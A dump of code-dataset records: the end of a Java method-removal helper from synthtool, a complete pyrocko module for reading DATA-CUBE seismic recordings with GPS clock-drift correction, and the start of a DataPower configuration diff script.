package_pattern=package_pattern,\n suffix=\"-java\",\n destination_name=destination_name,\n cloud_api=cloud_api,\n diregapic=diregapic,\n )\n\n return library\n\ndef common_templates(**kwargs) -> None:\n pass\n\ndef custom_templates(**kwargs) -> None:\n pass\n\ndef remove_method(filename: str, signature: str):\n \"\"\"Helper to remove an entire method.\n\n Goes line-by-line to detect the start of the block. Determines\n the end of the block by a closing brace at the same indentation\n level. 
This requires the file to be correctly formatted.\n\n Example: consider the following class:\n\n class Example {\n public void main(String[] args) {\n System.out.println(\"Hello World\");\n }\n\n public String foo() {\n return \"bar\";\n }\n }\n\n To remove the `main` method above, use:\n\n remove_method('path/to/file', 'public void main(String[] args)')\n\n Args:\n filename (str): Path to source file\n signature (str): Full signature of the method to remove. Example:\n `public void main(String[] args)`.\n \"\"\"\n lines = []\n leading_regex = None\n with open(filename, \"r\") as fp:\n line = fp.readline()\n while line:\n # for each line, try to find the matching signature\n regex = re.compile(\"(\\\\s*)\" + re.escape(signature) + \".*\")\n match = regex.match(line)\n if match:\n leading_regex = re.compile(match.group(1) + \"}\")\n line = fp.readline()\n continue\n\n # not inside a block to remove - preserve the line\n if not leading_regex:\n lines.append(line)\n line = fp.readline()\n continue\n\n # detect the closing tag based on the leading spaces\n match = leading_regex.match(line)\n if match:\n # block is closed, resume capturing content\n leading_regex = None\n\n line = fp.readline()\n\n with open(filename, \"w\") as fp:\n for line in lines:\n # print(line)\n fp.write(line)\n", "repo_name": "googleapis/rules_gapic", "sub_path": "synth/synthtool/languages/java.py", "file_name": "java.py", "file_ext": "py", "file_size_in_byte": 8642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "glob.iglob", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "synthtool.log.logger.info", "line_number": 56, "usage_type": "call"}, {"api_name": "synthtool.log.logger", "line_number": 56, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "synthtool.shell.run", "line_number": 59, "usage_type": "call"}, {"api_name": "synthtool.shell", "line_number": 59, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 61, "usage_type": "name"}, {"api_name": "synthtool.replace", "line_number": 62, "usage_type": "call"}, {"api_name": "synthtool.replace", "line_number": 68, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 75, "usage_type": "name"}, {"api_name": "synthtool.replace", "line_number": 76, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 83, "usage_type": "name"}, {"api_name": "synthtool.copy", "line_number": 119, "usage_type": "call"}, {"api_name": "synthtool.copy", "line_number": 124, "usage_type": "call"}, {"api_name": "synthtool.copy", "line_number": 130, "usage_type": "call"}, {"api_name": "synthtool.gcp.GAPICBazel", "line_number": 145, "usage_type": "attribute"}, {"api_name": "synthtool.gcp", "line_number": 145, "usage_type": "name"}, {"api_name": "synthtool.gcp.GAPICBazel", "line_number": 170, "usage_type": "call"}, {"api_name": "synthtool.gcp", "line_number": 170, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 230, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 230, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 233, "usage_type": "call"}]}
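remove_method in the record above keys the end of a block off a closing brace at the signature's own indentation. The same scan, compressed into a standalone sketch (my naming; like the original it assumes consistently formatted input):

import re

def strip_block(source, signature):
    # Drop the block opened by `signature` through the matching '}' at the
    # same indentation; everything else is copied through unchanged.
    out, closing = [], None
    for line in source.splitlines(keepends=True):
        if closing is None:
            m = re.match(r"(\s*)" + re.escape(signature), line)
            if m:
                closing = re.compile(re.escape(m.group(1)) + r"\}")
                continue
            out.append(line)
        elif closing.match(line):
            closing = None  # block closed; resume copying
    return "".join(out)

src = "class A {\n  void f() {\n    g();\n  }\n  int x;\n}\n"
print(strip_block(src, "void f()"))  # keeps class A, int x; drops f()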
+{"seq_id": "7649788349", "text": "# http://pyrocko.org - GPLv3\n#\n# The Pyrocko Developers, 21st Century\n# ---|P------/S----------~Lg----------\n# python 2/3\nfrom __future__ import absolute_import\n\nimport os\nimport math\nimport logging\n\nimport numpy as num\n\nfrom pyrocko import trace, util, plot\nfrom pyrocko.guts import Object, Int, String, Timestamp\n\nfrom . import io_common\n\nlogger = logging.getLogger('pyrocko.io.datacube')\n\nN_GPS_TAGS_WANTED = 200 # must match definition in datacube_ext.c\n\n\ndef color(c):\n c = plot.color(c)\n return tuple(x/255. for x in c)\n\n\nclass DataCubeError(io_common.FileLoadError):\n pass\n\n\nclass ControlPointError(Exception):\n pass\n\n\ndef make_control_point(ipos_block, t_block, tref, deltat):\n\n # reduce time (no drift would mean straight line)\n tred = (t_block - tref) - ipos_block*deltat\n\n # first round, remove outliers\n q25, q75 = num.percentile(tred, (25., 75.))\n iok = num.logical_and(q25 <= tred, tred <= q75)\n\n # detrend\n slope, offset = num.polyfit(ipos_block[iok], tred[iok], 1)\n tred2 = tred - (offset + slope * ipos_block)\n\n # second round, remove outliers based on detrended tred, refit\n q25, q75 = num.percentile(tred2, (25., 75.))\n iok = num.logical_and(q25 <= tred2, tred2 <= q75)\n x = ipos_block[iok].copy()\n ipos0 = x[0]\n x -= ipos0\n y = tred[iok].copy()\n (slope, offset), cov = num.polyfit(x, y, 1, cov=True)\n\n slope_err, offset_err = num.sqrt(num.diag(cov))\n slope_err_limit = 1.0e-10\n offset_err_limit = 5.0e-3\n\n if slope_err > slope_err_limit:\n raise ControlPointError('slope error too large')\n\n if offset_err > offset_err_limit:\n raise ControlPointError('offset error too large')\n\n ic = ipos_block[ipos_block.size//2]\n tc = offset + slope * (ic - ipos0)\n\n return ic, tc + ic * deltat + tref\n\n\ndef analyse_gps_tags(header, gps_tags, offset, nsamples):\n\n ipos, t, fix, nsvs = gps_tags\n deltat = 1.0 / int(header['S_RATE'])\n\n tquartz = offset + ipos * deltat\n\n toff = t - tquartz\n toff_median = num.median(toff)\n\n n = t.size\n\n dtdt = (t[1:n] - t[0:n-1]) / (tquartz[1:n] - tquartz[0:n-1])\n\n ok = abs(toff_median - toff) < 10.\n\n xok = num.abs(dtdt - 1.0) < 0.00001\n\n ok[0] = False\n ok[1:n] &= xok\n ok[0:n-1] &= xok\n ok[n-1] = False\n\n ipos = ipos[ok]\n t = t[ok]\n fix = fix[ok]\n nsvs = nsvs[ok]\n\n blocksize = N_GPS_TAGS_WANTED // 2\n\n try:\n if ipos.size < blocksize:\n raise ControlPointError(\n 'could not safely determine time corrections from gps')\n\n j = 0\n control_points = []\n tref = num.median(t - ipos*deltat)\n while j < ipos.size - blocksize:\n ipos_block = ipos[j:j+blocksize]\n t_block = t[j:j+blocksize]\n try:\n ic, tc = make_control_point(ipos_block, t_block, tref, deltat)\n control_points.append((ic, tc))\n except ControlPointError:\n pass\n j += blocksize\n\n ipos_last = ipos[-blocksize:]\n t_last = t[-blocksize:]\n try:\n ic, tc = make_control_point(ipos_last, t_last, tref, deltat)\n control_points.append((ic, tc))\n except ControlPointError:\n pass\n\n if len(control_points) < 2:\n raise ControlPointError(\n 'could not safely determine time corrections from gps')\n\n i0, t0 = control_points[0]\n i1, t1 = control_points[1]\n i2, t2 = control_points[-2]\n i3, t3 = control_points[-1]\n if len(control_points) == 2:\n tmin = t0 - i0 * deltat - offset * deltat\n tmax = t3 + (nsamples - i3 - 1) * deltat\n else:\n icontrol = num.array(\n [x[0] for x in control_points], dtype=num.int64)\n tcontrol = num.array(\n [x[1] for x in control_points], dtype=num.float)\n # robust 
against steps:\n slope = num.median(\n (tcontrol[1:] - tcontrol[:-1])\n / (icontrol[1:] - icontrol[:-1]))\n\n tmin = t0 + (offset - i0) * slope\n tmax = t2 + (offset + nsamples - 1 - i2) * slope\n\n if offset < i0:\n control_points[0:0] = [(offset, tmin)]\n\n if offset + nsamples - 1 > i3:\n control_points.append((offset + nsamples - 1, tmax))\n\n icontrol = num.array([x[0] for x in control_points], dtype=num.int64)\n tcontrol = num.array([x[1] for x in control_points], dtype=num.float)\n\n return tmin, tmax, icontrol, tcontrol, ok\n\n except ControlPointError:\n\n tmin = util.str_to_time(header['S_DATE'] + header['S_TIME'],\n format='%y/%m/%d%H:%M:%S')\n\n idat = int(header['DAT_NO'])\n if idat == 0:\n tmin = tmin + util.gps_utc_offset(tmin)\n else:\n tmin = util.day_start(tmin + idat * 24.*3600.) \\\n + util.gps_utc_offset(tmin)\n\n tmax = tmin + (nsamples - 1) * deltat\n icontrol, tcontrol = None, None\n return tmin, tmax, icontrol, tcontrol, None\n\n\ndef plot_timeline(fns):\n from matplotlib import pyplot as plt\n\n fig = plt.figure()\n axes = fig.gca()\n\n h = 3600.\n\n if isinstance(fns, str):\n fn = fns\n if os.path.isdir(fn):\n fns = [\n os.path.join(fn, entry) for entry in sorted(os.listdir(fn))]\n\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_timing_context(fns)\n\n else:\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_extended_timing_context(fn)\n\n else:\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_timing_context(fns)\n\n deltat = 1.0 / int(header['S_RATE'])\n\n tref = num.median(t - ipos * deltat)\n tref = round(tref / deltat) * deltat\n\n x = ipos*deltat\n y = (t - tref) - ipos*deltat\n\n bfix = fix != 0\n bnofix = fix == 0\n\n tmin, tmax, icontrol, tcontrol, ok = analyse_gps_tags(\n header, (ipos, t, fix, nsvs), offset, nsamples)\n\n la = num.logical_and\n nok = num.logical_not(ok)\n\n axes.plot(\n x[la(bfix, ok)]/h, y[la(bfix, ok)], '+',\n ms=5, color=color('chameleon3'))\n axes.plot(\n x[la(bfix, nok)]/h, y[la(bfix, nok)], '+',\n ms=5, color=color('aluminium4'))\n\n axes.plot(\n x[la(bnofix, ok)]/h, y[la(bnofix, ok)], 'x',\n ms=5, color=color('chocolate3'))\n axes.plot(\n x[la(bnofix, nok)]/h, y[la(bnofix, nok)], 'x',\n ms=5, color=color('aluminium4'))\n\n tred = tcontrol - icontrol*deltat - tref\n axes.plot(icontrol*deltat/h, tred, color=color('aluminium6'))\n axes.plot(icontrol*deltat/h, tred, 'o', ms=5, color=color('aluminium6'))\n\n ymin = (math.floor(tred.min() / deltat)-1) * deltat\n ymax = (math.ceil(tred.max() / deltat)+1) * deltat\n\n # axes.set_ylim(ymin, ymax)\n if ymax - ymin < 1000 * deltat:\n ygrid = math.floor(tred.min() / deltat) * deltat\n while ygrid < ymax:\n axes.axhline(ygrid, color=color('aluminium4'), alpha=0.3)\n ygrid += deltat\n\n xmin = icontrol[0]*deltat/h\n xmax = icontrol[-1]*deltat/h\n xsize = xmax - xmin\n xmin -= xsize * 0.1\n xmax += xsize * 0.1\n axes.set_xlim(xmin, xmax)\n\n axes.set_ylim(ymin, ymax)\n\n axes.set_xlabel('Uncorrected (quartz) time [h]')\n axes.set_ylabel('Relative time correction [s]')\n\n plt.show()\n\n\ng_dir_contexts = {}\n\n\nclass DirContextEntry(Object):\n path = String.T()\n tstart = Timestamp.T()\n ifile = Int.T()\n\n\nclass DirContext(Object):\n path = String.T()\n mtime = Timestamp.T()\n entries = DirContextEntry.T()\n\n def get_entry(self, fn):\n path = os.path.abspath(fn)\n for entry in self.entries:\n if entry.path == path:\n return entry\n\n raise Exception('entry not found')\n\n def iter_entries(self, fn, step=1):\n current = self.get_entry(fn)\n by_ifile = dict(\n 
(entry.ifile, entry) for entry in self.entries\n if entry.tstart == current.tstart)\n\n icurrent = current.ifile\n while True:\n icurrent += step\n try:\n yield by_ifile[icurrent]\n\n except KeyError:\n break\n\n\ndef context(fn):\n from pyrocko import datacube_ext\n\n dpath = os.path.dirname(os.path.abspath(fn))\n mtimes = [os.stat(dpath)[8]]\n\n dentries = sorted([os.path.join(dpath, f) for f in os.listdir(dpath)\n if os.path.isfile(os.path.join(dpath, f))])\n for dentry in dentries:\n fn2 = os.path.join(dpath, dentry)\n mtimes.append(os.stat(fn2)[8])\n\n mtime = float(max(mtimes))\n\n if dpath in g_dir_contexts:\n dir_context = g_dir_contexts[dpath]\n if dir_context.mtime == mtime:\n return dir_context\n\n del g_dir_contexts[dpath]\n\n entries = []\n for dentry in dentries:\n fn2 = os.path.join(dpath, dentry)\n if not os.path.isfile(fn2):\n continue\n\n with open(fn2, 'rb') as f:\n first512 = f.read(512)\n if not detect(first512):\n continue\n\n with open(fn2, 'rb') as f:\n try:\n header, data_arrays, gps_tags, nsamples, _ = \\\n datacube_ext.load(f.fileno(), 3, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n header = dict(header)\n entries.append(DirContextEntry(\n path=os.path.abspath(fn2),\n tstart=util.str_to_time(\n '20' + header['S_DATE'] + ' ' + header['S_TIME'],\n format='%Y/%m/%d %H:%M:%S'),\n ifile=int(header['DAT_NO'])))\n\n dir_context = DirContext(mtime=mtime, path=dpath, entries=entries)\n\n return dir_context\n\n\ndef get_time_infos(fn):\n from pyrocko import datacube_ext\n\n with open(fn, 'rb') as f:\n try:\n header, _, gps_tags, nsamples, _ = datacube_ext.load(\n f.fileno(), 1, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n return dict(header), gps_tags, nsamples\n\n\ndef get_timing_context(fns):\n joined = [[], [], [], []]\n ioff = 0\n for fn in fns:\n header, gps_tags, nsamples = get_time_infos(fn)\n\n ipos = gps_tags[0]\n ipos += ioff\n\n for i in range(4):\n joined[i].append(gps_tags[i])\n\n ioff += nsamples\n\n ipos, t, fix, nsvs = [num.concatenate(x) for x in joined]\n\n nsamples = ioff\n return ipos, t, fix, nsvs, header, 0, nsamples\n\n\ndef get_extended_timing_context(fn):\n c = context(fn)\n\n header, gps_tags, nsamples_base = get_time_infos(fn)\n\n ioff = 0\n aggregated = [gps_tags]\n\n nsamples_total = nsamples_base\n\n if num.sum(gps_tags[2]) == 0:\n\n ioff = nsamples_base\n for entry in c.iter_entries(fn, 1):\n\n _, gps_tags, nsamples = get_time_infos(entry.path)\n\n ipos = gps_tags[0]\n ipos += ioff\n\n aggregated.append(gps_tags)\n nsamples_total += nsamples\n\n if num.sum(gps_tags[2]) > 0:\n break\n\n ioff += nsamples\n\n ioff = 0\n for entry in c.iter_entries(fn, -1):\n\n _, gps_tags, nsamples = get_time_infos(entry.path)\n\n ioff -= nsamples\n\n ipos = gps_tags[0]\n ipos += ioff\n\n aggregated[0:0] = [gps_tags]\n\n nsamples_total += nsamples\n\n if num.sum(gps_tags[2]) > 0:\n break\n\n ipos, t, fix, nsvs = [num.concatenate(x) for x in zip(*aggregated)]\n\n# return ipos, t, fix, nsvs, header, ioff, nsamples_total\n return ipos, t, fix, nsvs, header, 0, nsamples_base\n\n\ndef iload(fn, load_data=True, interpolation='sinc'):\n from pyrocko import datacube_ext\n from pyrocko import signal_ext\n\n if interpolation not in ('sinc', 'off'):\n raise NotImplementedError(\n 'no such interpolation method: %s' % interpolation)\n\n with open(fn, 'rb') as f:\n if load_data:\n loadflag = 2\n else:\n 
loadflag = 1\n\n try:\n header, data_arrays, gps_tags, nsamples, _ = datacube_ext.load(\n f.fileno(), loadflag, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n header = dict(header)\n deltat = 1.0 / int(header['S_RATE'])\n nchannels = int(header['CH_NUM'])\n\n ipos, t, fix, nsvs, header_, offset_, nsamples_ = \\\n get_extended_timing_context(fn)\n\n tmin, tmax, icontrol, tcontrol, _ = analyse_gps_tags(\n header_, (ipos, t, fix, nsvs), offset_, nsamples_)\n\n if icontrol is None:\n logger.warn(\n 'No usable GPS timestamps found. Using datacube header '\n 'information to guess time. (file: \"%s\")' % fn)\n\n tmin_ip = round(tmin / deltat) * deltat\n if interpolation != 'off':\n tmax_ip = round(tmax / deltat) * deltat\n else:\n tmax_ip = tmin_ip + (nsamples-1) * deltat\n\n nsamples_ip = int(round((tmax_ip - tmin_ip)/deltat)) + 1\n # to prevent problems with rounding errors:\n tmax_ip = tmin_ip + (nsamples_ip-1) * deltat\n\n leaps = num.array(\n [x[0] + util.gps_utc_offset(x[0]) for x in util.read_leap_seconds2()],\n dtype=num.float)\n\n if load_data and icontrol is not None:\n ncontrol_this = num.sum(\n num.logical_and(0 <= icontrol, icontrol < nsamples))\n\n if ncontrol_this <= 1:\n logger.warn(\n 'Extrapolating GPS time information from directory context '\n '(insufficient number of GPS timestamps in file: \"%s\").' % fn)\n\n for i in range(nchannels):\n if load_data:\n arr = data_arrays[i]\n assert arr.size == nsamples\n\n if interpolation == 'sinc' and icontrol is not None:\n\n ydata = num.empty(nsamples_ip, dtype=num.float)\n try:\n signal_ext.antidrift(\n icontrol, tcontrol,\n arr.astype(num.float), tmin_ip, deltat, ydata)\n\n except signal_ext.Error as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n e.set_context('n_control_points', icontrol.size)\n e.set_context('n_samples_raw', arr.size)\n e.set_context('n_samples_ip', ydata.size)\n e.set_context('tmin_ip', util.time_to_str(tmin_ip))\n raise e\n\n ydata = num.round(ydata).astype(arr.dtype)\n else:\n ydata = arr\n\n tr_tmin = tmin_ip\n tr_tmax = None\n else:\n ydata = None\n tr_tmin = tmin_ip\n tr_tmax = tmax_ip\n\n tr = trace.Trace('', header['DEV_NO'], '', 'p%i' % i, deltat=deltat,\n ydata=ydata, tmin=tr_tmin, tmax=tr_tmax, meta=header)\n\n bleaps = num.logical_and(tmin_ip <= leaps, leaps < tmax_ip)\n\n if num.any(bleaps):\n assert num.sum(bleaps) == 1\n tcut = leaps[bleaps][0]\n\n for tmin_cut, tmax_cut in [\n (tr.tmin, tcut), (tcut, tr.tmax+tr.deltat)]:\n\n try:\n tr_cut = tr.chop(tmin_cut, tmax_cut, inplace=False)\n tr_cut.shift(\n util.utc_gps_offset(0.5*(tr_cut.tmin+tr_cut.tmax)))\n yield tr_cut\n\n except trace.NoData:\n pass\n\n else:\n tr.shift(util.utc_gps_offset(0.5*(tr.tmin+tr.tmax)))\n yield tr\n\n\nheader_keys = {\n str: b'GIPP_V DEV_NO E_NAME GPS_PO S_TIME S_DATE DAT_NO'.split(),\n int: b'''P_AMPL CH_NUM S_RATE D_FILT C_MODE A_CHOP F_TIME GPS_TI GPS_OF\n A_FILT A_PHAS GPS_ON ACQ_ON V_TCXO D_VOLT E_VOLT'''.split()}\n\nall_header_keys = header_keys[str] + header_keys[int]\n\n\ndef detect(first512):\n s = first512\n\n if len(s) < 512:\n return False\n\n if ord(s[0:1]) >> 4 != 15:\n return False\n\n n = s.find(b'\\x80')\n if n == -1:\n n = len(s)\n\n s = s[1:n]\n s = s.replace(b'\\xf0', b'')\n s = s.replace(b';', b' ')\n s = s.replace(b'=', b' ')\n kvs = s.split(b' ')\n\n if len([k for k in all_header_keys if k in kvs]) == 0:\n return False\n return True\n\n\nif __name__ == '__main__':\n import sys\n fns = sys.argv[1:]\n if 
len(fns) > 1:\n plot_timeline(fns)\n else:\n plot_timeline(fns[0])\n", "repo_name": "wuxyair/pyrocko", "sub_path": "src/io/datacube.py", "file_name": "datacube.py", "file_ext": "py", "file_size_in_byte": 16718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "pyrocko.plot.color", "line_number": 25, "usage_type": "call"}, {"api_name": "pyrocko.plot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pyrocko.util.str_to_time", "line_number": 168, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 168, "usage_type": "name"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 173, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 173, "usage_type": "name"}, {"api_name": "pyrocko.util.day_start", "line_number": 175, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 175, "usage_type": "name"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 176, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 222, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 223, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 243, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 244, "usage_type": "call"}, {"api_name": "math.floor", 
"line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "pyrocko.guts.Object", "line_number": 271, "usage_type": "name"}, {"api_name": "pyrocko.guts.String.T", "line_number": 272, "usage_type": "call"}, {"api_name": "pyrocko.guts.String", "line_number": 272, "usage_type": "name"}, {"api_name": "pyrocko.guts.Timestamp.T", "line_number": 273, "usage_type": "call"}, {"api_name": "pyrocko.guts.Timestamp", "line_number": 273, "usage_type": "name"}, {"api_name": "pyrocko.guts.Int.T", "line_number": 274, "usage_type": "call"}, {"api_name": "pyrocko.guts.Int", "line_number": 274, "usage_type": "name"}, {"api_name": "pyrocko.guts.Object", "line_number": 277, "usage_type": "name"}, {"api_name": "pyrocko.guts.String.T", "line_number": 278, "usage_type": "call"}, {"api_name": "pyrocko.guts.String", "line_number": 278, "usage_type": "name"}, {"api_name": "pyrocko.guts.Timestamp.T", "line_number": 279, "usage_type": "call"}, {"api_name": "pyrocko.guts.Timestamp", "line_number": 279, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 309, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path", "line_number": 312, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path", "line_number": 313, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 315, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path", "line_number": 330, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 341, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 341, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 343, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "pyrocko.util.str_to_time", "line_number": 351, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 351, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 366, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 366, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 369, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 369, "usage_type": "name"}, {"api_name": 
"numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 442, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 463, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 463, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 466, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 496, "usage_type": "call"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 497, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 497, "usage_type": "name"}, {"api_name": "pyrocko.util.read_leap_seconds2", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 498, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 516, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext.antidrift", "line_number": 518, "usage_type": "call"}, {"api_name": "pyrocko.signal_ext", "line_number": 518, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 520, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext.Error", "line_number": 522, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext", "line_number": 522, "usage_type": "name"}, {"api_name": "pyrocko.util.time_to_str", "line_number": 528, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 528, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 531, "usage_type": "call"}, {"api_name": "pyrocko.trace.Trace", "line_number": 542, "usage_type": "call"}, {"api_name": "pyrocko.trace", "line_number": 542, "usage_type": "name"}, {"api_name": "numpy.logical_and", "line_number": 545, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 547, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 548, "usage_type": "call"}, {"api_name": "pyrocko.util.utc_gps_offset", "line_number": 557, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 557, "usage_type": "name"}, {"api_name": "pyrocko.trace.NoData", "line_number": 560, "usage_type": "attribute"}, {"api_name": "pyrocko.trace", "line_number": 560, "usage_type": "name"}, {"api_name": "pyrocko.util.utc_gps_offset", "line_number": 564, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 564, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 602, "usage_type": "attribute"}]}
+{"seq_id": "18423106603", "text": "import os\nimport io\nimport sys\nimport difflib\nimport hashlib\nfrom lxml import etree\nfrom mast.cli import Cli\nfrom mast.hashes import get_sha256\nfrom mast.logging import make_logger\nfrom itertools import groupby, combinations\nfrom collections import OrderedDict, defaultdict\nfrom glob import glob\n\nremove_namespaces_xslt = '''\n\n\n\n \n \n \n \n\n\n \n \n \n \n\n\n \n \n \n \n \n'''\nremove_namespaces_xslt = etree.parse(io.BytesIO(str.encode(remove_namespaces_xslt)))\nREMOVE_NAMESPACES = etree.XSLT(remove_namespaces_xslt)\n\ndef sort_children(node):\n children = node.xpath(\"./*\")\n children = sorted(children, key=lambda child: child.tag)\n groups = groupby(children, key=lambda child: child.tag)\n groups = dict((x, list(y)) for x, y in groups)\n for k in sorted(groups.keys()):\n for child in sorted(groups[k], key=lambda child: child.get(\"name\")):\n if len(child):\n sort_children(child)\n _attrib = OrderedDict((k, v) for k, v in sorted(child.attrib.items(), key=lambda n: n[0]))\n node.remove(child)\n child.attrib.clear()\n child.attrib.update(_attrib)\n node.append(child)\n\ndef clean(tree):\n for node in tree.xpath(\"/datapower-configuration/export-details\"):\n 